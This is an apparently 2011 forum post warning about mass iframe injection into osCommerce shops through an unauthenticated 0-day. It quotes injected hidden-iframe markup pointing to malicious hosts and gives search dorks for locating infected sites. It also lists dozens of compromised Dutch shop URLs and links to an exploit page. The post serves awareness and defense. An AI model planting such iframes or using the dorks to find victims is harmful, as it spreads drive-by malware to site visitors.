Hmm.. this makes me think about Gumblar.
The reason for all of this is probably an 0-day found on July 10th, 2011 for the open-source software "osCommerce." Appearentely, you can edit the site info without being logged in. This means you can add JavaScript. The exploit, which is nothing more than a clue, can be found here:
http://www.1337day.com/exploits/16505.
I put the URL leading to the exploit here because the site is known to blackhats, and webserver admins can make better security stages and create workarounds.
Something you can try is making the URL:
not accessible from the outside.
For example, hxxp://
www.bikes4less.nl/catalog/ (visiting is your own risk!) shows that the website got cracked earlier with, probably, the same exploit:
Code: Select all<title>Hacked By Tn Mahdi Sad Hacker<iframe src='http://willysy.com/images/banners/'
style='position:absolute;visibility:hidden'></iframe></title>
By the way, the rest of the webpage is not really good anymore, lol.
Anyway, here's a talk about it. The Dutch version, the original, was also posted to the security.nl boards on Tuesday.
http://blog.armorize.com/2011/07/willys ... on-ongoing reports a flood of compromised website that upload malware. (source: http://threatpost.com/en_us/blogs/massi ... ges-072611)
Visiting such compromised website with a PC which doesn't have the latest security updates installed (webbrowser, operating system, Java, Adobe Leaker, Adobe Flash, Quicktime and plug-ins)is enough to have your computer get classified "compromised."
Searching with the dork "src=http://exero.eu" site:.nl was enough to find the amount of Dutch websites (somethings only certain pages of the following) that were compromised. Google only warns for some of the following websites though: (this is from Tuesday)
hxxp://123clonephones.nl/
hxxp://innologic.nl/
hxxp://onderdelenvolvo.nl/
hxxp://sanik.nl/webshop/
hxxp://www.2ehands-online.nl/
hxxp://www.accuwijzer.nl/catalog/
hxxp://www.ballookado.nl/catalog/
hxxp://www.berkenpeis.nl/winkel/
hxxp://www.blingsundaysbest.nl/webshop/
hxxp://www.bottegabijoux.nl/shop/information_2.php
hxxp://www.depaardenshop.nl/shop/index.php?cPath=29_33
hxxp://www.dilomatoro.nl/
hxxp://www.dogsupplyservice.nl/english_kitchen ... =1&sort=2d
hxxp://www.duraroos.nl/catalog/
hxxp://www.dutchfone.nl/
hxxp://www.eshopsplaza.nl/wakkerdier/
hxxp://www.glazen-deur.nl/
hxxp://www.height-safety.nl/store/catalog/
hxxp://www.hippestippe.nl/shop/products_new.php?page=13
hxxp://www.keijlsmagic.nl/winkel/
hxxp://www.koffiebonenonline.nl/
hxxp://www.marinestore.nl/
hxxp://www.mirjamsknutselplezier.nl/products_new.php
hxxp://www.nikahorseproducts.nl/catalog/
hxxp://www.nordicnew.nl/onlineshop/
hxxp://www.paintballclub.nl/shop/catalog/
hxxp://www.rpgamershop.nl/shop/
hxxp://www.shoes-n-things.nl/
hxxp://www.tagdepartment.nl/store/
hxxp://www.umutelectronica.nl/
hxxp://www.yottawatts.nl/
A part of the above websites allow you to pay with a credit card...
The following websites/pages were, according to Google, compromised, but are likely to be fixed right now:
hxxp://www.bodyflower.nl/winkel/
hxxp://www.europacker.nl/shop/
hxxp://www.morgenisnu.nl/shop/eldiolie495ml-p-397.html
You can recognize infected pages by looking at their source. You will see something like the following:
Code: Select all<title>Innologic</title><iframe src='http://exero.eu/catalog/css.htm' style='position:absolute;visibility:hidden'></iframe><title></title>
Searching with the dork "http://willysy.com/images/banners/" site:.nl will give you results with partly the same websites.
